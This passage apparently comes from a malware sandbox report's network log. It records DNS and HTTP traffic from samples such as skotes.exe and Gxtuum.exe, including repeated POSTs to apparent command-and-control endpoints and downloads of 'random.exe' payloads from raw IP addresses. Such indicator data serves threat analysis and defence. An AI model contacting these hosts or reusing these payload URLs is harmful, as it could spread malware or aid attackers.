                      IN A
                      Response
                      c.pki.goog
                      IN CNAME
                      pki-goog.l.google.com
                      pki-goog.l.google.com
                      IN A
                      142.250.179.67
                    • GET (FR)
                      http://c.pki.goog/r/r1.crl
                      df1fc80896.exe
                      Remote address:
                      142.250.179.67:80
                      Request
                      GET /r/r1.crl HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Microsoft-CryptoAPI/6.1
                      Host: c.pki.goog
                      Response
                      HTTP/1.1 200 OK
                      Accept-Ranges: bytes
                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                      Cross-Origin-Resource-Policy: cross-origin
                      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                      Content-Length: 854
                      X-Content-Type-Options: nosniff
                      Server: sffe
                      X-XSS-Protection: 0
                      Date: Sun, 22 Dec 2024 02:07:54 GMT
                      Expires: Sun, 22 Dec 2024 02:57:54 GMT
                      Cache-Control: public, max-age=3000
                      Age: 1411
                      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                      Content-Type: application/pkix-crl
                      Vary: Accept-Encoding
                    • DNS (US)
                      o.pki.goog
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      o.pki.goog
                      IN A
                      Response
                      o.pki.goog
                      IN CNAME
                      pki-goog.l.google.com
                      pki-goog.l.google.com
                      IN A
                      142.250.179.67
                    • GET (FR)
                      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf
                      df1fc80896.exe
                      Remote address:
                      142.250.179.67:80
                      Request
                      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Microsoft-CryptoAPI/6.1
                      Host: o.pki.goog
                      Response
                      HTTP/1.1 200 OK
                      Server: ocsp_responder
                      Content-Length: 472
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Date: Sun, 22 Dec 2024 02:28:22 GMT
                      Cache-Control: public, max-age=14400
                      Content-Type: application/ocsp-response
                      Age: 183
                    • GET (FR)
                      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
                      df1fc80896.exe
                      Remote address:
                      142.250.179.67:80
                      Request
                      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Microsoft-CryptoAPI/6.1
                      Host: o.pki.goog
                      Response
                      HTTP/1.1 200 OK
                      Server: ocsp_responder
                      Content-Length: 472
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Date: Sun, 22 Dec 2024 02:23:57 GMT
                      Cache-Control: public, max-age=14400
                      Content-Type: application/ocsp-response
                      Age: 449
                    • DNS (US)
                      drive.usercontent.google.com
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      drive.usercontent.google.com
                      IN A
                      Response
                      drive.usercontent.google.com
                      IN A
                      142.250.74.225
                    • GET (FR)
                      https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      df1fc80896.exe
                      Remote address:
                      142.250.74.225:443
                      Request
                      GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                      User-Agent: FileDownloader
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Host: drive.usercontent.google.com
                      Response
                      HTTP/1.1 200 OK
                      X-GUploader-UploadID: AFiumC6EQLRFuwCdAT682YaxWqXZslL1tBZ7pR4Zey4F01p8il2IWfFoFUEIqz7Jfi1JJdwi
                      Content-Type: image/png
                      Content-Security-Policy: sandbox
                      Content-Security-Policy: default-src 'none'
                      Content-Security-Policy: frame-ancestors 'none'
                      X-Content-Security-Policy: sandbox
                      Cross-Origin-Opener-Policy: same-origin
                      Cross-Origin-Embedder-Policy: require-corp
                      Cross-Origin-Resource-Policy: same-site
                      X-Content-Type-Options: nosniff
                      Content-Disposition: attachment; filename="output.png"
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Credentials: false
                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                      Accept-Ranges: bytes
                      Content-Length: 156917
                      Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                      Date: Sun, 22 Dec 2024 02:31:29 GMT
                      Expires: Sun, 22 Dec 2024 02:31:29 GMT
                      Cache-Control: private, max-age=0
                      X-Goog-Hash: crc32c=h6mvlQ==
                      Server: UploadServer
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    • 185.215.113.43:80
                      http://185.215.113.43/Zu7JuNko/index.php
                      http
                      skotes.exe
                      4.7kB
                      5.7kB
                      36
                      26

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200
                    • 185.215.113.16:80
                      http://185.215.113.16/luma/random.exe
                      http
                      skotes.exe
                      53.1kB
                      1.9MB
                      1025
                      1351

                      HTTP Request

                      GET http://185.215.113.16/luma/random.exe

                      HTTP Response

                      200
                    • 185.215.113.16:80
                      http://185.215.113.16/off/random.exe
                      http
                      skotes.exe
                      98.2kB
                      7.0MB
                      2112
                      5015

                      HTTP Request

                      GET http://185.215.113.16/steam/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/well/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/off/random.exe

                      HTTP Response

                      200
                    • 185.215.113.206:80
                      http://185.215.113.206/c4becf79229cb002.php
                      http
                      ac7623e0c4.exe
                      871 B
                      1.1kB
                      8
                      7

                      HTTP Request

                      GET http://185.215.113.206/

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.206/c4becf79229cb002.php

                      HTTP Response

                      200
                    • 127.0.0.1:49290
                      firefox.exe
                    • 127.0.0.1:49298
                      firefox.exe
                    • 34.120.5.221:443
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      tls, http2
                      firefox.exe
                      3.7kB
                      14.0kB
                      25
                      23

                      HTTP Request

                      GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    • 172.217.18.206:443
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      tls, http2
                      firefox.exe
                      3.7kB
                      10.7kB
                      25
                      21

                      HTTP Request

                      GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                      HTTP Request

                      GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    • 142.250.179.110:443
                      www.youtube.com
                      tls, http2
                      firefox.exe
                      1.9kB
                      8.2kB
                      14
                      11
                    • 142.250.179.110:443
                      www.youtube.com
                      tls, http2
                      firefox.exe
                      3.4kB
                      9.2kB
                      22
                      14
                    • 142.250.179.110:443
                      consent.youtube.com
                      firefox.exe
                      52 B
                      1
                    • 142.250.179.110:443
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      tls, http2
                      firefox.exe
                      3.2kB
                      64.6kB
                      36
                      53

                      HTTP Request

                      GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    • 172.217.20.164:443
                      www.google.com
                      tls
                      firefox.exe
                      2.1kB
                      340 B
                      12
                      7
                    • 172.217.20.164:443
                      www.google.com
                      tls, http2
                      firefox.exe
                      1.4kB
                      5.3kB
                      12
                      12
                    • 88.221.134.155:80
                      ciscobinary.openh264.org
                      firefox.exe
                      294 B
                      144 B
                      6
                      3
                    • 88.221.134.155:80
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      http
                      firefox.exe
                      6.8kB
                      467.5kB
                      135
                      344

                      HTTP Request

                      GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                      HTTP Response

                      200
                    • 172.217.20.174:443
                      redirector.gvt1.com
                      tls
                      firefox.exe
                      2.1kB
                      9.0kB
                      19
                      22
                    • 74.125.175.169:443
                      r4---sn-aigzrnsz.gvt1.com
                      tls
                      firefox.exe
                      143.3kB
                      8.7MB
                      2763
                      6244
                    • 34.117.121.53:443
                      firefox-settings-attachments.cdn.mozilla.net
                      tls
                      firefox.exe
                      1.5kB
                      21.0kB
                      13
                      22
                    • 31.41.244.11:80
                      http://31.41.244.11/files/martin/random.exe
                      http
                      skotes.exe
                      162.4kB
                      12.3MB
                      3419
                      12775

                      HTTP Request

                      GET http://31.41.244.11/files/burpin1/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/geopoxid/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/zhigarko/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/kardanvalov88/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/martin/random.exe

                      HTTP Response

                      200
                    • 216.58.214.174:443
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      tls, http2
                      firefox.exe
                      2.7kB
                      8.5kB
                      16
                      18

                      HTTP Request

                      POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                    • 172.67.177.88:443
                      https://cheapptaxysu.click/api
                      tls, http
                      ef0449806c.exe
                      1.6kB
                      10.1kB
                      12
                      18

                      HTTP Request

                      POST https://cheapptaxysu.click/api

                      HTTP Response

                      403

                      HTTP Request

                      POST https://cheapptaxysu.click/api

                      HTTP Response

                      200
                    • 212.193.31.8:80
                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php
                      http
                      Gxtuum.exe
                      790 B
                      521 B
                      7
                      5

                      HTTP Request

                      POST http://212.193.31.8/3ofn3jf3e2ljk2/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://212.193.31.8/3ofn3jf3e2ljk2/index.php

                      HTTP Response

                      200
                    • 142.250.75.238:443
                      https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      tls, http
                      df1fc80896.exe
                      926 B
                      8.3kB
                      10
                      10

                      HTTP Request

                      GET https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download

                      HTTP Response

                      303
                    • 142.250.179.67:80
                      http://c.pki.goog/r/r1.crl
                      http
                      df1fc80896.exe
                      302 B
                      1.7kB
                      4
                      4

                      HTTP Request

                      GET http://c.pki.goog/r/r1.crl

                      HTTP Response

                      200
                    • 142.250.179.67:80
                      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
                      http
                      df1fc80896.exe
                      838 B
                      3.1kB
                      8
                      6

                      HTTP Request

                      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

                      HTTP Response

                      200

                      HTTP Request

                      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC

                      HTTP Response

                      200
                    • 142.250.74.225:443
                      https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      tls, http
                      df1fc80896.exe
                      2.9kB
                      139.7kB
                      52
                      105

                      HTTP Request

                      GET https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download

                      HTTP Response

                      200
                    • 34.117.59.81:443
                      df1fc80896.exe
                    • 8.8.8.8:53
                      spocs.getpocket.com
                      dns
                      firefox.exe
                      65 B
                      131 B
                      1
                      1

                      DNS Request

                      spocs.getpocket.com

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      getpocket.cdn.mozilla.net
                      dns
                      firefox.exe
                      71 B
                      174 B
                      1
                      1

                      DNS Request

                      getpocket.cdn.mozilla.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      175 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      164 B
                      110 B
                      2
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      2600:1901:0:524c::

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      114 B
                      85 B
                      2
                      1

                      DNS Request

                      youtube.com

                      DNS Request

                      youtube.com

                      DNS Response

                      2a00:1450:4007:805::200e

                    • 172.217.18.206:443
                      youtube.com
                      https
                      firefox.exe
                      10.3kB
                      10.7kB
                      15
                      11
                    • 8.8.8.8:53
                      www.youtube.com
                      dns
                      firefox.exe
                      61 B
                      271 B
                      1
                      1

                      DNS Request

                      www.youtube.com

                      DNS Response

                      142.250.179.110
                      172.217.18.206
                      172.217.20.206
                      216.58.215.46
                      216.58.214.174
                      142.250.179.78
                      142.250.178.142
                      172.217.20.174
                      142.250.75.238
                      142.250.201.174
                      216.58.214.78

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      136 B
                      116 B
                      2
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Response

                      44.228.225.150
                      44.240.87.158
                      52.40.120.141

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      94 B
                      110 B
                      1
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.149.100.209

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      188 B
                      187 B
                      2
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      68 B
                      153 B
                      1
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      276 B
                      245 B
                      4
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      142.250.178.142
                      142.250.179.78
                      216.58.214.78
                      216.58.215.46
                      142.250.75.238
                      172.217.20.206
                      216.58.214.174
                      142.250.201.174
                      142.250.179.110
                      172.217.20.174
                      172.217.18.206

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      103 B
                      119 B
                      1
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      34.160.144.191

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      206 B
                      131 B
                      2
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      2600:1901:0:92a9::

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      69 B
                      181 B
                      1
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      2a00:1450:4007:808::200e
                      2a00:1450:4007:80e::200e
                      2a00:1450:4007:810::200e
                      2a00:1450:4007:80c::200e

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      130 B
                      81 B
                      2
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      3.5kB
                      9.3kB
                      10
                      10
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      195 B
                      81 B
                      3
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      4.6kB
                      12.0kB
                      17
                      17
                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      76 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      120 B
                      76 B
                      2
                      1

                      DNS Request

                      www.google.com

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      88 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      2a00:1450:4007:80c::2004

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      195 B
                      93 B
                      3
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      2a00:1450:4007:818::200e

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                      DNS Response

                      35.244.181.201

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      164 B
                      175 B
                      2
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                    • 8.8.8.8:53
                      ciscobinary.openh264.org
                      dns
                      firefox.exe
                      70 B
                      286 B
                      1
                      1

                      DNS Request

                      ciscobinary.openh264.org

                      DNS Response

                      88.221.134.155
                      88.221.134.209

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      134 B
                      99 B
                      2
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      88.221.134.155
                      88.221.134.209

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      67 B
                      123 B
                      1
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      2a02:26f0:a1::58dd:869b
                      2a02:26f0:a1::58dd:86d1

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      130 B
                      81 B
                      2
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      93 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      2a00:1450:4007:80c::200e

                    • 172.217.20.174:443
                      redirector.gvt1.com
                      https
                      firefox.exe
                      3.3kB
                      9.3kB
                      8
                      10
                    • 8.8.8.8:53
                      r4---sn-aigzrnsz.gvt1.com
                      dns
                      firefox.exe
                      71 B
                      116 B
                      1
                      1

                      DNS Request

                      r4---sn-aigzrnsz.gvt1.com

                      DNS Response

                      74.125.175.169

                    • 8.8.8.8:53
                      r4.sn-aigzrnsz.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      85 B
                      1
                      1

                      DNS Request

                      r4.sn-aigzrnsz.gvt1.com

                      DNS Response

                      74.125.175.169

                    • 8.8.8.8:53
                      r4.sn-aigzrnsz.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      97 B
                      1
                      1

                      DNS Request

                      r4.sn-aigzrnsz.gvt1.com

                      DNS Response

                      2a00:1450:4009:1b::9

                    • 74.125.175.169:443
                      r4.sn-aigzrnsz.gvt1.com
                      https
                      firefox.exe
                      2.5kB
                      5.9kB
                      13
                      8
                    • 8.8.8.8:53
                      firefox-settings-attachments.cdn.mozilla.net
                      dns
                      firefox.exe
                      90 B
                      177 B
                      1
                      1

                      DNS Request

                      firefox-settings-attachments.cdn.mozilla.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      122 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      199 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      77 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      216.58.214.174

                    • 8.8.8.8:53
                      cheapptaxysu.click
                      dns
                      ef0449806c.exe
                      64 B
                      96 B
                      1
                      1

                      DNS Request

                      cheapptaxysu.click

                      DNS Response

                      172.67.177.88
                      104.21.67.146

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
